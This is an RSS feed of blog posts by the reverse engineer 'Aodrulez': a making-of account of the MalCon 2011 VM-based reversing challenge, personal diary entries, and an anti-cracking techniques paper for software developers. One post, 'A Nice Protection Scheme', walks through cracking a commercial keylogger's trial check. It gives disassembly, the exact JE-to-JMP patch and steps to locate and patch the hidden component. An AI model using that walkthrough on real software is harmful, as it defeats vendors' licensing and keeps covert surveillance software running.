<?xml version="1.0" encoding="utf-8"?>
<rss version="0.92">
<channel>
<title>SecuObs.com</title>
<link>http://www.secuobs.com</link>
<description>Internet security observatory</description>
<language>fr</language>
<webMaster>webmaster@secuobs.com</webMaster>
<item><title>The Pied Piper - MalCon_2012</title><description>2012-12-17 11:22:22 - Aodrulez : The Pied Piper from Aodrulez. You can download the entire ppt, along with a detailed explanation as well as the accompanying videos, here: Download</description><link>http://www.secuobs.com/revue/news/417329.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/417329.shtml</guid></item>
<item><title>My solution to malwarelu's HackGyver challenges</title><description>Secuobs.com : 2012-12-17 11:22:22 - Aodrulez - My solution to malwarelu HackGyver's challenges from Aodrulez</description><link>http://www.secuobs.com/revue/news/417328.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/417328.shtml</guid></item>
<item><title>The Making of MalCon CTM-2011 Challenge</title><description>Secuobs.com : 2011-12-07 20:43:06 - Aodrulez - Well, it was declared last year itself, after the first MalCon, that we'll be having our own version of an online challenge for the world to compete over. We called it the CTM, which stood for 'Capture the Mal' challenge. Nothing much happened after that though. We all got busy with the rest of our work until about 3 months before the event, when we realized that we promised a CTM &amp; had completely forgotten about it. As usual, when it comes to technical stuff @ MalCon, I am the SPOC. So, I was left with a mammoth task. It's not that I've never designed a CTF contest before; in fact I do that for all my workshops &amp; training sessions. But this one was different. We do MalCon every year not because it earns us something or because we get perks for doing it. In fact, we make no money out of it at all. We do it because it was our dream. We've learnt about 90% of what we know by reading 'tuts' n textfiles on the internet, created by generous &amp; highly talented people. We wanted to do our bit too. MalCon is not about spreading malwares. It's about generating proactive research by good people to build secure systems.

Well, so here I was, with no idea at all about how I am gonna design this CTM thingy. And then it happened. I have this weird 'moment' once in a while where I get bombarded with loads of crazy ideas. That's how the idea of creating a Virtual-Machine based challenge came to my mind. But there were 2 major problems:
1. I had no experience in creating a VM manually.
2. I wanted it to be simple enough so that even a common man can attempt it.
At first, I had to create a VM myself to prove that it's possible. I know that there are thousands of articles on that available but this one had to be simple. The idea was to create a VM architecture that was as simple as possible so that the ones attempting it do not end up getting demoralized, while the VM-Code, or the 'Bootrom' as I call it, can be complex enough to deliver the quality &amp; standards that we at MalCon are fanatic about. The good part was, I have considerable understanding &amp; experience with programming as well as reverse-engineering. I've got past experience with creating some really complex &amp; effective anti-reversing routines too. So, I figured out that this one won't be as tough as I thought it would be, initially. How wrong was I :D

To begin with, I named my Abstract Processor 'Aod8'. Then, I tried to design it similar to the Intel processors I am comfortable with. Although I figured out that I don't need more than 15 instructions in my instruction-set to create a complex CTM, I thought that maybe someone, someday might wanna write some cool program for it &amp; that's the only reason why I ended up having about 40 instructions in all. Once the design part of it was over &amp; I was almost sure that I had the required instructions in there, it was time to code the processor. My first choice was 'PERL'. It's easy to program in, robust with REGEX &amp; more importantly I did not have to mess with variable types. Ah, I think I forgot to mention that in order to keep the CTM easy to attempt, I designed the processor to work with 'Byte' sized instructions &amp; data. Most people are not comfortable with handling data at 'bit' level. So, that was the reason behind this super simplistic Aod8 Architecture design.

Well, the PERL idea was disastrous. Initially I struggled a little with type conversion. Then again, I never write the entire code at one stretch, ever :P I write some, then test it thoroughly &amp; then go further. When I am trying a new idea or a theory, I am totally impatient to see if it works or not. So obviously, the first instructions I implemented in my Aod8 processor were the ones that'll allow me to print a character on the screen so that if it works as expected, I can jump up &amp; down &amp; celebrate victory. But but but... the way I've designed it, I can only print one character at a time. That too, if I send the 'output' opcode, it'll fetch the byte at the current location of the stack-pointer on the stack &amp; print it. Now, let's say I want to print 'A' on the screen. For that, I'll have to first push its ASCII code onto the stack :D As you can see, I cannot directly push data onto the stack either. For that, I'll have to move the ASCII code to a GPR like 'A' or 'B', then push it onto the stack, then call the 'output' instruction. In essence, the set of instructions to print a char 'A' on the screen in Aod8 Assembly would be:

mov a,65
mov [sp],a
output
halt

Well, I've already uploaded all the Tools, source-codes &amp; everything related to my Aod8 project on GitHub &amp; you can find them here: https://github.com/Aodrulez/Aod8

Below is the output on my terminal when I compile this code using my Aod8 Assembler written in PERL, just to give you an idea of how the entire thing works. So yea, that works perfectly. When the bootrom is executed by the Aod8 Emulator (Virtual Machine or Abstract Processor implementation, whichever way you like to call it), it does print 'A' on the screen. But let me remind you that at that time I never had an assembler. So, to see that output, I had to manually construct a bootrom using a Hex-Editor by inserting opcodes &amp; data in hex. The moment I saw it print 'A' on the screen, I was in trance :D That was it! It proved my theory of a crazy CTM to be practically possible &amp; from that point onwards it was a mad rush to complete the processor implementation as soon as possible.

Well, I wrote it entirely in PERL first. But after constructing a bootrom manually, I wasn't getting the expected results. That's when I found out that I made some major 'Type Conversion' errors here &amp; there. This was awfully painful. Either I could spend another day fixing the Perl implementation, which was starting to get me frustrated, or I can switch to C/C++ &amp; wind it up ASAP. I opted for the second option for two reasons:
1. I know C/C++ very well.
2. It'll prove my theory that the CTM can be played by anyone who can implement the Processor, in any language he likes.
So that was it. I got the processor written top-to-bottom in less than 2 hrs. Now that I knew that I've implemented the Design perfectly, it was time to test each &amp; every instruction. Initially I enjoyed the geek-feeling it gave to construct bootroms out of hex-editors manually but pretty soon I was having severe headaches :D That's when I decided it's time to write an 'Assembler' for this Architecture. In the meantime, I had my PERL implementation too sorted out by comparing the output of my 'C' implementation. I did not even realize when this became an obsession. I was working on my office related work all day &amp; working on this CTM all nite. In a few days' time, I had a very crude Assembler that can convert asm code to bootroms, 2 implementations of the Aod8 processor &amp; a slightly tweaked version of the 'C' implementation acting like a debugger/tracer.

It was time to learn the basics of programming something that I created :D Yea, it sure sounds easy but it was not. Just when I started to try serious programming, I realised that in my obsession with keeping the design simple, I had seriously limited the programming possibilities of the architecture. The design was so simplistic that I could not even implement self-modifying code, because the ROM was, as the name suggests, Read-Only. The Aod8 processor was designed to fetch instructions &amp; execute them, &amp; the stack was provided solely to store temporary data. It was impossible to modify the code during execution. This meant that everything that was part of the CTM challenge had to be put up in a clearly-visible form inside the bootrom. Anyone with a code tracer would end up dumping all the important data off the bootrom. Another limitation was the 'byte' implementation. The only flow-control instructions that were used in the CTM were cmp, je, jne, jle, jmp &amp; loop. As you can see, every other jmp instruction requires a parameter. This parameter specifies the location to jump/execute from now on. The catch here though is that the Aod8 Architecture can only have data up to the size of a 'byte'. The biggest number in a single byte is 255, which meant that theoretically I would have been limited to a bootrom of size 255 bytes as I could not access a higher number because of the limitation in the design. That's when I decided to tweak the design a little bit &amp; partially bypass the limitation, yet keeping the design simple. You'll understand what I did if you observe the way I've implemented the 'jmp/loop' instructions.

So far, so good. Now that I had some crude tools &amp; a thorough understanding of the programming details, it was time to begin creating the CTM. Somewhere near that time a huge tragedy struck: Steve Jobs passed away &amp; we were all in shock. That was when I decided that I am going to do my bit for him. That's the reason you'll see a brief text right in the beginning of the CTM challenge when you boot it. It was my way of thanking him for all that he has done.

Well, at first, I wanted to have challenges appearing back to back as the Aod8 Architecture was seriously limited, but once I had the first level done, it looked so very boring. It was time to push it up a few notches &amp; be artistic. That was when I realised that my Assembler was seriously crude :D Spent another day adding support for 'Labels' in my Assembler so that I can write code like "jmp label_beginning" instead of "jmp 134". That was one helluva experience in itself. At the end of the day, I had a sophisticated Assembler which made it much much easier to code things. I needed to start designing the CTM again from scratch (phew!). But now I am so glad that I did. This time around I wanted to create a Linux-like feeling to it. Getting the initial UI until you hit 'run' took about 2 days to code. It was amazing, yet I felt something was just not right. I thought that if I put up an Easter-Egg in the section where the general UI resides, chances are people won't find it out that easily. That's when I thought, why not create a 'Brainfuck Interpreter' for this architecture :D It'll be a piece of ART. And guess what, it took more time than creating the rest of the CTM itself. If you want to see the first Easter-Egg, boot the CTM challenge &amp; when it says "Press ENTER to boot AoDOS-Trial from this Bootrom", type ' ' &amp; hit enter:

aodrulez pwn4g3 malcon ctm  processor
--------------------------
Aod8 Virtual Processor
--------------------------
(c) Aodrulez
Reading the Boot-Rom...
Read successfully. Total Size: 136300
Registers initialised to 0
Booting using the Boot-Rom...
-------------------------------
-----------------------------------------------------
Here's to the crazy ones. The misfits. The rebels.
The troublemakers. The round pegs in the square
holes. The ones who see things differently. They're
not fond of rules. And they have no respect for
the status quo. You can quote them, disagree with
them, glorify or vilify them. About the only thing
you can't do is ignore them. Because they change
things. They push the human race forward. And while
some may see them as the crazy ones, we see genius.
Because the people who are crazy enough to think
they can change the world, are the ones who do.
Think Different.
-----------------------------------------------------
A tribute to the iConic Steve Jobs from the
entire MalCon Team
No more open Windows for malwares
Press ENTER to boot AoDOS-Trial from this Bootrom
Welcome to the Magic Dungeon
---------------------------------------------
Aodrulez's Brainfuck Interpreter for AoDOS
---------------------------------------------
Note: The code should end with ' ' character
Note: The code should not contain Line-Feeds
Enter Brainfuck code:
, -  z zyxwvutsrqponmlkjihgfedcba  ZYXWVUTSRQPONMLKJIHGFEDCBA

Well, it's a full-fledged Brainfuck interpreter written entirely in Aod8 Assembler. You can try most of the brainfuck programs in it.

This was when my boss asked me to report the progress I made with the CTM :D It took me some time to explain what I've done &amp; although he understood the beauty of it, he was worried that maybe not many will be able to solve it. That's when we decided that we keep it as simple as possible so that most of the people who attempt it can crack it. I was already done with 3 levels by this time. I had some major plans for level-4 &amp; level-5 when we had this discussion &amp; that's when I decided to completely drop the idea of Level-5. I also re-wrote level-3 to have a very simple algorithm that can be easily reversed. Level-4 is basically a crackme that I wrote in Brainfuck, being emulated on my Aod8 Brainfuck Interpreter. Again, I re-wrote a simpler version of the Brainfuck crackme so that it's do-able. It was not designed for the Uber-Reversers at all. It was for noobs &amp; for people who are majorly into programming. Just by looking at the design I can think of funny ways to defeat all the levels, the weakest point of the design being the Stack. An emulator that dumps stack contents would have ended the game right away. And frankly, we wanted winners. It's amazing that I spent 1 whole month re-writing the CTM to make it simpler. We had officially 2 winners this time: Aseem &amp; Dhanesh. They did a wonderful job. But trust me, I've received more mails with compliments &amp; evident eagerness from people who were just attempting it. For most, the part when they got the Emulator done &amp; when the bootrom displayed the initial message was an achievement in itself. And for each mail that I received, I won once.

Now, let me give a brief idea of what the CTM contained. It was about 130kb in size. I managed to squeeze in 4 levels, 2 Easter-Eggs, the entire asm code of the CTM except Level-4, the Aod8 Processor implementation in C as well as PERL, a real virus code, a complete 3-pass Assembler for Aod8 &amp; a sample asm file to explain the usage. Now, that's pure Art. But it took me close to 2 months (yea, I have a very hectic day-job where I work on ten thousand things at a time :P) to complete it, out of which I spent one whole month re-designing it to be simple. I wrote the CTM almost 3 times from scratch. Tested it on Windows, Linux &amp; even on my iPod to be sure that it works. The Brainfuck Interpreter was a test of my patience &amp; persistence :D I wrote that right from scratch almost 3/4 times until I got it right. In fact, I wrote the Aod8 asm code for it on paper manually about 4 times. I designed each level separately &amp; finally, when it was time to combine all of them into one single bootrom, it just won't work. Spent another whole week going through about 1,29,918 lines of code &amp; debugging every single jump &amp; loop instruction until I got it fixed. I guess it's not patience after all, I am just plain adamant.

Overall, for me it was a huge learning curve. More than that, it has been a personal milestone in many ways. I've always wanted to give back to the community &amp; this one gave me a platform to reach a wide range of people. I hope that everyone who attempted the MalCon CTM this year had a good time. Special Thanks to Shantanu Gawade for being my Beta-Tester. Nirvana-Achieved.</description><link>http://www.secuobs.com/revue/news/345929.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/345929.shtml</guid></item>
<item><title>She Ain't Gonna Last Nope</title><description>Secuobs.com : 2009-03-17 08:04:25 - Aodrulez - I am Single. I love my Life. Love my Life n yepp, lemme say that again, I love my Life. There was a time when i felt like a lil female attention won't be bad, but heck... Now, to be frank, I really Don't care about gettin any attention. Amidst this beautiful feelin came She. God knows from where, but yeah, she seemed to be too friendly to complain. Everyone loves to get pampered once in a while n so was I. This part of my life is wats called as "The Abundance Paradox". When u really need sumthin, it seems like thats the toughest thing on this planet to have, n when u have sumthin in Abundance, or are really not interested in gettin "It", "It" seems to be flowin into ur life in Abundance. "The Abundance Paradox" as I put it. Now the problem here was that "It" was a beautiful "She". Out of nowhere she landed in my life... a simple gmail chat led to Phone No. Espionage n then yepp, then one fine Monday evening she Called. Shes' too fast I thought... or maybe dat was because I was out-of-the-scene fer a while. Anyways, no complains, no feelins... decided to Go-wid-Da-Flow. Turned out we were in the adjacent rooms all our lives, right from skool to coaching classes to Church, n we never saw each other. Amazing diskovery, but still not Interested... nah. Sms'es became usual stuph. actually I hate tapping out sms'es on ma phone but hey, anything fer you lol. Constant touch was maintained until one day we decided to meet. She turned out to be a Beautiful Girl, i was'nt actually expecting that ;) Had a Cuppa-Coffee n then I dropped her home. beautiful nite. Must admit, she came, She saw, She conquered. But but but... Am not Head-over-Heels dear, just a crush maybe, n i Know that its just that, "A Crush". Today am feelin different, possibly even she's feelin different n all that I have to say, or rather Predict, is: with my Jarhead Attitude (fer me rightly so) n Not-So-Suicidal-Nature, the question of us fallin in Love is a "Syntax Error" n lemme tell you, even though I Almost-love her, "She Ain't Gonna Last Nope".</description><link>http://www.secuobs.com/revue/news/71661.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/71661.shtml</guid></item>
<item><title>Aodrulez: I've Arrived</title><description>Secuobs.com : 2009-02-04 21:54:28 - Aodrulez - Sounds like a Hollywood Movie Script of the late 1980's. I end up doing all sorts of Blunders in my life. all through my childhood n teenage days, when i look back now, all I see is a Mr. Nobody, you know, the kind of life where u exist in silence... Dead-Silence in my case. was trying to be the good guy all life, living in some kind of a wonderland, lacking contact with the real world, drifting away from the worldly ways of Life. Screwed up the few relationships that I've ever had, bigtime, and thats when i realised my life sucks. I felt like a creature in a cocoon. I desperately wanted to break free n "Live My Life, My Way". I knew that this was an Alien world to be in, with lots of un-tresspassed paths, n I wanted to get lost somewhere, and this seemed to be the perfect Time. I really needed to forget my past, forget my mistakes, forget my ex's, forget my back-stabbing friends, forget the very truth that I was alive till yet or that I merely existed. I wanted to start anew. I tried to be occupied all the time in something or the other, tryin to learn new things, new skills, n what can i say, I've come a long way. Feels better now, as a human Being, as a Son, as a Friend, as a Brother, but still I have a long long way to go, and I aint givin-up cuz I aint a quitter anymore.</description><link>http://www.secuobs.com/revue/news/58462.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/58462.shtml</guid></item>
<item><title>My Rules</title><description>Secuobs.com : 2009-02-04 21:54:28 - Aodrulez -
1. Keep updating the Rules to suit situations and my mood.
2. Never under-estimate anyone, not even a fly.
3. Never change yourself to attract or impress anyone.
4. Opinions are just that, "OPINIONS"; in the end do what you feel is right.
5. Being Single is not sumthin to be ashamed of.
6. Self-Respect is more important than anything else, never lose it.
7. Be the Best in atleast one thing in Life.
8. Give Respect, Take Respect.
9. Never get into Fights cuz it ruins your Image, but if the Bad Guy insists, Break his Jaw.
10. Live My Life "My Way".</description><link>http://www.secuobs.com/revue/news/58461.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/58461.shtml</guid></item>
<item><title>I... is it just an Alphabet</title><description>Secuobs.com : 2009-02-04 21:54:28 - Aodrulez - Millions of people livin on this planet we call earth, yet how many do we know by the name? we r like frogs in a well, but the question is how big is this well. we earthlings r in a sort of well too, attached to earth, bound by the laws of physics cuz we know they r true. they are practical laws, they do Work, and unfortunately we havent yet found a frame in which they fail. So we Believe and dont dare to question them anymore. sad. I feel like am tied cuz of the thoughts of some Great people, but what are human thoughts anyway? who really cares about them apart from us earthlings? why do we seem to like the idea of being important in this Big-Bang soup? why do we even think? maybe cuz that is sumthin we were made to do by years of evolution. we think n so we are. We often hear children wishin they could have wings &amp; fly. how often do we hear the grown-ups say the same? dats cuz we know we cant do it on earth due to the laws of nature. heck, y cant we even dream without being constrained by these laws? I wanna have a better view of myself from some another frame, were nobody is bound by any strings, where we dont feel like puppets who go back to the same box from where they came. I wanna Break-Free, like get out of my own skin and fly at a speed which is a multiple of the speed of light. i wanna see my life in slow motion. i wanna Rewind to the past n make a lot of rectifications. i wanna Fast-forward to future and see whats in store fer me. i wanna be able to live my life my way. I wanna Feel Like GOD. I do.</description><link>http://www.secuobs.com/revue/news/58460.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/58460.shtml</guid></item>
<item><title>V For Vendetta</title><description>Secuobs.com : 2009-02-04 21:54:28 - Aodrulez - Did sumthin i never believed i could, even in my wildest Dreams. Mask-man, i was talkin in disguise, that strongly reminds me of a movie, "V" for Vendetta. Yup, I felt wat it felt to be "V". But there was a difference: "V" fought to change the Governments' Attitude, to do people good. I was just being selfish I guess. Dunno how many more times will i wear the same Mask, cuz its a temptation. wish i won't ever do that again. Felt her in a good mood fer the first time in 4-5 years. Talked like we never knew each-other. Didnt have to explain my past mistakes. felt like i did the biggest mistake of my life, screwing-up our relationship 4 yrs back. But Great Men say "He who never made a mistake, never made a discovery". I did n i made a discovery or two, the problem is the contradicting nature of the discoveries. Dunno which one to follow. Helpless? nope. Hopeless? haha, yeah, thats the truth, the relationship is a hopeless one now n i ain't doing the same mistakes again. Told her not to look out fer my identity, not worth it, cuz grass alwayz looks greener on the other side, don't walk across n spoil the view. So fer now "V" in me is goin fer hibernation until she wakes him up. "V" did what Aodrulez could'nt do, n Thanks a ton fer that.</description><link>http://www.secuobs.com/revue/news/58459.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/58459.shtml</guid></item>
<item><title>A Nice Protection Scheme</title><description>Secuobs.com : 2009-02-04 21:54:28 - Aodrulez - Detailed Analysis of a recent Commercial Keylogger App is as follows:
1. Uses a Driver (*.sys) for all its keylogging activity.
2. Driver is set up as a Service.
3. Setup.exe of the keylogger generates random names for its core components which are installed.
4. Setup as well as the installed components verify if the application has been registered by accepting a "key" and using a very tedious key validation routine.
5. The only limitations of the trial version are some nags and a limited time-period for the usage of the app, after which u need to register it to use it.

The actual protection scheme used:
1. Setup.exe actually generates a random name for the temporary file created.
2. Then it extracts a DLL, which contains the actual installation routine.
3. The main function of this DLL is to:
a. Generate a random name.
b. Use this random name as the prefix of the components which are to be installed.
c. Then install the Driver, which is also assigned the random name, as a Service on the host system.
4. But the important thing to note is that the driver which is installed has no "function" to check if the application's trial period is over or not.
5. If you have not registered the app, you have a trial period of 15 Days in which the application is fully functional except for the nags that show up.

Now, onto the ways to crack this protection scheme:
1. One way of doing it could be to find out the registration routine and reverse it.
2. Another way is to patch it.
Well, the serial validation routine looked really tedious, so I decided to "Patch my way to Glory".

Points to remember while attempting this technique:
1. Either patch the Setup.exe to always spit out files with the same names so that we could make a "Patch" for the app after we successfully crack it.
2. Or else crack the components which have been installed on the system.
Now the problem with the first point is that the actual routine which generates random names and installs components is in the DLL that is itself extracted from the Setup.exe. So, it won't be a great idea to try to patch the Setup and make it spit a patched version of the DLL that works according to our wishes. So I quickly moved on to cracking the components that were installed on my system.

Well... the best thing about this Keylogger, as far as cracking it is concerned, is that it shows all its core components' names if you select a Menu Option. So a huge task of hunting down those files is reduced. Now, as previously mentioned, the only limitations of the unregistered version are Nags and 15 Days of trial period. Well, a little snooping around helped me to pin-point the component which was responsible for determining if the trial period was over or not and also to generate the nags if it was still unregistered.

Note: One weakness of this scheme is that only this component was responsible to determine if the application was registered or not and to show the Nags. Even others could have been assigned the same task. Not only that, the application and all its components are written in C++ and the programmers didn't even bother to pack or protect them. Maybe it has to do something with the fact that during each installation the components probably even had different CRC... can't say for sure though.

Well... the executable probably uses Global Variables to determine its Registered Status. But still, modifying them wasn't needed either. Here is the disassembly of the section which determines if the application is registered or not:

004016E6  8D45 E4        LEA EAX,LOCAL.7
004016E9  50             PUSH EAX                                            ; /Arg2 = 00000000
004016EA  8B4D F4        MOV ECX,LOCAL.3                                     ; |kernel32.7C8399F3
004016ED  51             PUSH ECX                                            ; |Arg1 = 0012FFB0
004016EE  E8 CD110000    CALL savezl_e.004028C0                              ; &lt;-- Actual routine
004016F3  83C4 08        ADD ESP,8
004016F6  8945 E0        MOV LOCAL.8,EAX                                     ; EAX == Result
004016F9  837D E0 00     CMP LOCAL.8,0
004016FD  0F84 80000000  JE savezl_e.00401783
00401703  837D E4 00     CMP LOCAL.7,0
00401707  74 7A          JE SHORT savezl_e.00401783
00401709  837D E8 00     CMP LOCAL.6,0
0040170D  75 06          JNZ SHORT savezl_e.00401715
0040170F  837D EC 00     CMP LOCAL.5,0
00401713  7E 6E          JLE SHORT savezl_e.00401783
00401715  837D E8 00     CMP LOCAL.6,0
00401719  74 21          JE SHORT savezl_e.0040173C
0040171B  8D55 E4        LEA EDX,LOCAL.7
0040171E  52             PUSH EDX                                            ; /lParam = ntdll.KiFastSystemCallRet
0040171F  68 ED174000    PUSH savezl_e.004017ED                              ; |DlgProc = savezl_e.004017ED
00401724  6A 00          PUSH 0                                              ; |hOwner = NULL
00401726  6A 6A          PUSH 6A                                             ; |pTemplate = 6A
00401728  6A 00          PUSH 0                                              ; /pModule = NULL
0040172A  FF15 ECB04100  CALL NEAR DWORD PTR DS:[&lt;&amp;KERNEL32.GetModuleHandleA&gt;] ; \GetModuleHandleA
00401730  50             PUSH EAX                                            ; |hInst = NULL
00401731  FF15 F4B14100  CALL NEAR DWORD PTR DS:[&lt;&amp;USER32.DialogBoxParamA&gt;]   ; \DialogBoxParamA
00401737  8945 FC        MOV LOCAL.1,EAX
0040173A  EB 1F          JMP SHORT savezl_e.0040175B
0040173C  8D45 E4        LEA EAX,LOCAL.7
0040173F  50             PUSH EAX                                            ; /lParam = NULL
00401740  68 121A4000    PUSH savezl_e.00401A12                              ; |DlgProc = savezl_e.00401A12
00401745  6A 00          PUSH 0                                              ; |hOwner = NULL
00401747  6A 65          PUSH 65                                             ; |pTemplate = 65
00401749  6A 00          PUSH 0                                              ; /pModule = NULL
0040174B  FF15 ECB04100  CALL NEAR DWORD PTR DS:[&lt;&amp;KERNEL32.GetModuleHandleA&gt;] ; \GetModuleHandleA
00401751  50             PUSH EAX                                            ; |hInst = NULL
00401752  FF15 F4B14100  CALL NEAR DWORD PTR DS:[&lt;&amp;USER32.DialogBoxParamA&gt;]   ; \DialogBoxParamA
00401758  8945 FC        MOV LOCAL.1,EAX
0040175B  837D FC FF     CMP LOCAL.1,-1

As you can clearly see... the code which is highlighted in Red is the part that checks if the application is registered or not. Just modify the JE savezl_e.00401783 to JMP savezl_e.00401783 and you'll see that the application runs merrily for as long as you want and even all the Nags are eliminated. Just a small patch to kill such a beautiful registration routine. Okay, now the general method to crack it would be to install the Keylogger on your system. Now a normal Patch won't work in this case because we cannot predict the random name generated by the SETUP. So, we'll make a generic patcher that'll patch the code JE savezl_e.00401783 to JMP savezl_e.00401783 and won't check the CRC of the executable, because it was observed to fail when it checks for that. Oh yes, the component which needs to be patched is very easy to identify too... just go to your "Root\windows\System32" folder and search for "*l.exe", that is, all executable files with the last character as "l", and this particular executable has a Transparent Icon. You'll also find that it's running in your computer's memory because it's loaded during startup, so simply use the End Task option of Task Manager, patch the executable and restart your computer. You'll see that all nags are gone and also the time limit is gone. You can try changing the system time and still the Keylogger works perfectly fine.
(c) Aodrulez</description><link>http://www.secuobs.com/revue/news/58458.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/58458.shtml</guid></item>
<item><title>Anti-Software_Cracking Techniques</title><description>Secuobs.com : 2009-02-04 21:54:28 - Aodrulez - Author: Aodrulez
Email: f3arm3d3ar@gmail.com

Well, we all know there are thousands of such text files floating on the Internet. I'm not adding something to the already present chaos. This paper focuses primarily on approaches that you might find novel or useful in implementing "Anti-Cracking Protection" in your apps.

Techniques:

1. A Registration-Routine Technique

Simply bored of seeing the same tricks being used and abused, I thought of trying a novel approach. What if we tried this:

Usual registration routines:
1. Accept username/serial from the user or a file.
2. Use some math operators and either
   a. calculate the serial directly from the username and then compare it with the user-input serial (dumb), or
   b. calculate a hash from the username as well as from the serial (using different algorithms, of course) and then compare them.
3. Either carry on with the registered status,
4. or display a message saying "Not Registered".

My way:
1. Accept the username/serial from the user or a file.
2. Use some algorithm on both the username and the serial and, based on that, generate "opcodes".
3. Inject these opcodes into the registration routine.
4. If the generated "opcodes" match, then and only then will the app get registered; else it will crash.
5. Use SEH so that in case of a crash the app can be terminated elegantly.

So, algorithm-wise, this looks like this:
-----------------------------------------------------------------
@app_startup:
  1. Implement SEH.

@registration_routine:
  1. Accept username/password from the user or a file.
  2. Use some algorithm that generates "opcodes" from the user input data.
  3. Inject these opcodes into the successful_registration routine.

@successful_registration:
  Most of the instructions here are like this (MessageBoxA arguments are pushed last-first, so uType, lpCaption, lpText, hWnd):
    push 0                          ; uType
    push offset good-boy-caption    ; lpCaption
    push offset good-boy-text       ; lpText
    push 0                          ; hWnd
    lea eax, MessageBoxA
    db 090h   ; this byte has to become 0FFh for the MessageBoxA call to work
    db 0D0h   ; together they form the "call eax" instruction, byte sequence FF D0
  Depending upon the user input and the algorithm used, the 0x90 byte should be changed to / injected with 0xFF for the app to get registered. Else, if the user input is not correct, the rest of the routine will look malformed and the app will crash.

@SEH_routine:
  1. When the app crashes the SEH handler is called, and you can make a graceful exit or maybe handle it and resume execution.
-----------------------------------------------------------------

Benefits of this approach:
1. You can simply make the whole registration routine look bogus and generate it on the fly from user input.
2. Unless the user enters the right serial/sequence, the registration routine will always look bogus, so not much can be made from a disassembly of the routine.
3. The only way to crack this kind of protection would be to know the "opcodes" fairly well and know how code execution takes place.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2. Anti-patching

Well, most (almost all) of the debuggers of today rely on "0xCC", or rather "int3", for setting up normal breakpoints. How this works is like this: the moment you place a breakpoint somewhere, the opcode byte at that location gets replaced by a 0xCC byte. Now let's simplify this method's idea: the actual opcode is replaced by 0xCC, then the debugger monitors the app's execution to spot int3 being executed; if it's hit, the debugger halts execution at that point and replaces the 0xCC byte with the actual previous opcode byte.

How to defeat it? One way would be to implement a CRC check. Or you might go with the same idea and develop a small algorithm that simply calculates a magic value by going through your code during runtime and checks it against the actual value it should have if your app is intact. This approach of writing your own algorithm is recommended because the standard CRC library functions, if implemented in your app, can easily be detected by the tools currently available. (A plain scan for 0xCC bytes is not a substitute: 0xCC occurs legitimately inside immediates and data, so compare a checksum against a known-good value instead.)

Second way: yep, another good way would be to write the important parts of your app's code dynamically to the required locations, like used in many viruses. Example, here we go: a simple app with a username/serial type registration routine:
-----------------------------------------------------------------
app_startup: immediately when your app starts,
  1. Do a simple CRC-type check on the registration routine.
  2. If intact, copy the actual registration routine, byte-wise encrypted, into the encrypted_code section of the app's memory.
  3. Simultaneously nullify or "NOP" the actual registration routine.

registration_routine:
  1. Decrypt code from encrypted_code into the actual_code section of your app.
  2. Call this newly written routine for the validation of the registration details.

actual_code:
  1. The actual registration routine goes here.

encrypted_code:
  1. It's more like a buffer to store the encrypted registration routine.
-----------------------------------------------------------------

Benefits of using this technique:
1. The actual registration routine is always re-written before being executed. This kills the 0xCC byte placed by the debugger to cause a break in execution (breakpoint).
2. You can always use a CRC-type check to verify the integrity of your registration routine, so if it is patched by "newbie crackers" you could tackle this by over-writing it from a backup copy of your registration routine in the app's memory or a DLL.

(Caveat: this only defeats software breakpoints; hardware breakpoints set through the debug registers do not modify code bytes, and a breakpoint placed after the routine has been regenerated still hits.)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

3. Applying a Modified Shellcode Trick

Shellcodes are nothing but executable machine code which, if EIP points to it, will do something worthwhile :-) like maybe spawn a Windows calc. Shellcodes are many a time crafted for a particular version of an OS because of the library function calls that have to be made. But, with much less pain, a similar technique can be used to cause some more code-reversing trouble. Okies, that was a pathetic introduction to shellcodes, but it's another huge topic in itself and this paper only mentions certain aspects of it which we can use as anti-cracking techniques. So what can we use from them? Let's see another algorithm:
-----------------------------------------------------------------
@startup:
  1. Find the exact version of the OS your app is currently running on. Let's assume your registration routine uses the MessageBoxA function in it; in that case, recover the address of that function from a table already present in your app, which looks somewhat like this:
       Windows 2000:   MessageBoxA == 0x7AAAAAA
       Windows XP SP1: MessageBoxA == 0x7BBBBBB
       Windows XP SP2: MessageBoxA == 0x7CCCCCC
     Or else do something like this:
       lea eax, MessageBoxA
       mov api_Addr, eax   ; "api_Addr" is a variable to hold its address
     This eliminates the need for maintaining a table (and, unlike the table, it still works when the DLL is loaded at a different base, e.g. under ASLR).
  2. Call @Registration_routine_part_1.

@Registration_routine_part_1:
  1. The actual registration routine lies in the "@encrypted_registration_routine_part_2" section of your app's memory.
  2. So first you decrypt it right there.
  3. Now the Win32 API function calls will look obsolete, because the addresses differ.
  4. Inject the API's correct memory address from the api_Addr variable so that it's fixed.
  5. Call the @encrypted_registration_routine_part_2 routine.

@encrypted_registration_routine_part_2:
  1. This section contains already-encrypted machine code.
  2. For example, the actual unencrypted code could look something like this:
       push MB_OK           ; uType
       push offset Caption  ; lpCaption
       push offset Text     ; lpText
       push 0               ; hWnd
       call 0xAAAAAAAA      ; this is the address the previous function has to fix after decryption
-----------------------------------------------------------------

Benefits of this technique:
1. You don't need to have the actual code, then encrypt it and then decrypt it, as in the 2nd technique described in this paper.
2. If disassembled, this code will look fairly weird.
3. Even here, the breakpoints can be killed as described previously.

Of course these techniques are not fool-proof, but if implemented correctly and efficiently they can prevent your app from being cracked by the "newbie and maybe even intermediate" type of software cracker. One very important thing you must know is: "Every piece of code ever written to this day can be either reversed or patched." You can only try to make it harder or simply boring to do so :P

Hope this paper was useful :)

A very simple PoC of these techniques might be obtained from here:
http://www.crackmes.de/users/aodrulez/aodrulez_crackme_v10/
-----------------------------------------------------------------
Greetz fly out to:
1. Amforked: my mentor
2. LiquidWorm and Jeremy Brown: for being so nice to a noob like me
